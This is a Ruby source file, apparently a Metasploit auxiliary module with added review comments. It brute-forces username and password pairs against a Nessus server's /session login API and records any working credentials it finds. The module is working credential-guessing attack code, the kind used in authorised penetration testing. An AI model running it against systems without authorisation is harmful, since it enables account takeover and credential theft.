Path: blob/master/modules/auxiliary/scanner/nessus/nessus_rest_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/login_scanner/nessus'
require 'metasploit/framework/credential_collection'

# Auxiliary scanner that tries username/password pairs against the login API
# of a Nessus server and records the outcome of every attempt.
#
# What this file itself establishes:
# * the target defaults to port 8834, path '/session', with SSL enabled;
# * candidate credentials come from build_credential_collection, seeded with
#   the USERNAME and PASSWORD datastore options;
# * pacing and early exit are delegated to the login scanner through
#   BRUTEFORCE_SPEED and STOP_ON_SUCCESS;
# * a successful pair is stored as a credential plus a login record, while a
#   failed or unreachable attempt is recorded through invalidate_login.
#
# NOTE(review): the request format lives in
# Metasploit::Framework::LoginScanner::Nessus, not in this file. Presumably
# each attempt is one HTTP request to TARGETURI, which is what a defender
# would look for in the server's authentication logs; confirm against the
# scanner class.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers module metadata and options.
  #
  # SSL is on by default; HttpUsername / HttpPassword are deregistered, so the
  # credentials under test come only from the credential collection built in
  # #init.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Nessus RPC Interface Login Utility',
        'Description' => %q{
          This module will attempt to authenticate to a Nessus server RPC interface.
        },
        'Author' => [ 'void_in' ],
        'License' => MSF_LICENSE,
        'DefaultOptions' => { 'SSL' => true }
      )
    )

    module_options = [
      Opt::RPORT(8834),
      OptString.new('TARGETURI', [ true, 'The path to the Nessus server login API', '/session'])
    ]
    register_options(module_options)

    deregister_options('HttpUsername', 'HttpPassword')
  end

  # Builds the credential collection and the Nessus login scanner for one host.
  #
  # Both objects are kept in instance variables (@cred_collection, @scanner)
  # and reused by #run_host and #bruteforce.
  #
  # @param ip [String] address of the host under test
  def init(ip)
    @cred_collection = build_credential_collection(
      password: datastore['PASSWORD'],
      username: datastore['USERNAME']
    )

    # connection_timeout is fixed at 5 (presumably seconds) and is not exposed
    # as a module option.
    scanner_settings = configure_http_login_scanner(
      host: ip,
      port: datastore['RPORT'],
      uri: datastore['TARGETURI'],
      proxies: datastore['PROXIES'],
      cred_details: @cred_collection,
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: 5
    )

    @scanner = Metasploit::Framework::LoginScanner::Nessus.new(scanner_settings)
    @scanner.ssl = datastore['SSL']
    @scanner.ssl_version = datastore['SSLVERSION']
  end

  # Records a working credential and the login it was validated against.
  #
  # The password is passed to create_credential verbatim
  # (private_type: :password), so after a successful run the workspace data
  # contains a usable Nessus credential and needs the same protection as the
  # credential itself.
  #
  # @param ip [String] address of the Nessus server
  # @param port [Integer] TCP port the login succeeded on
  # @param result [Object] scanner result; #credential, #status and #proof are read
  def do_report(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    found_credential = result.credential
    credential_data = {
      module_fullname: fullname,
      origin_type: :service,
      private_data: found_credential.private,
      private_type: :password,
      username: found_credential.public,
      **service_data
    }

    # The credential has to exist before the login record can point at it.
    login_data = {
      core: create_credential(credential_data),
      last_attempted_at: DateTime.now,
      status: result.status,
      proof: result.proof,
      **service_data
    }

    create_credential_login(login_data)
  end

  # Runs the scanner and handles each attempt as it is yielded.
  #
  # SUCCESSFUL attempts are printed and stored through #do_report.
  # UNABLE_TO_CONNECT and INCORRECT attempts are printed only in verbose mode
  # and recorded with invalidate_login; they differ only in the message shown.
  # Any other status is ignored.
  #
  # @param ip [String] address of the host under test
  def bruteforce(ip)
    login_status = Metasploit::Model::Login::Status

    @scanner.scan! do |attempt|
      case attempt.status
      when login_status::SUCCESSFUL
        print_brute(level: :good, ip: ip, msg: "Success: '#{attempt.credential}'")
        do_report(ip, rport, attempt)
      when login_status::UNABLE_TO_CONNECT, login_status::INCORRECT
        # A connection failure reports the scanner's proof text; a rejected
        # credential reports the pair that was tried.
        failure_msg =
          case attempt.status
          when login_status::UNABLE_TO_CONNECT then attempt.proof
          else "Failed: '#{attempt.credential}'"
          end

        vprint_brute(level: :verror, ip: ip, msg: failure_msg)
        invalidate_login(
          address: ip,
          port: rport,
          protocol: 'tcp',
          public: attempt.credential.public,
          private: attempt.credential.private,
          realm_key: attempt.credential.realm_key,
          realm_value: attempt.credential.realm,
          status: attempt.status,
          proof: attempt.proof
        )
      end
    end
  end

  # Per-host entry point called by the Scanner mixin.
  #
  # Login attempts are only made when the scanner's check_setup accepts the
  # target; otherwise an error is printed and the host is skipped.
  #
  # @param ip [String] address of the host under test
  def run_host(ip)
    init(ip)

    if @scanner.check_setup
      bruteforce(ip)
    else
      print_brute(level: :error, ip: ip, msg: 'Target is not a Tenable Nessus server')
      nil
    end
  end
end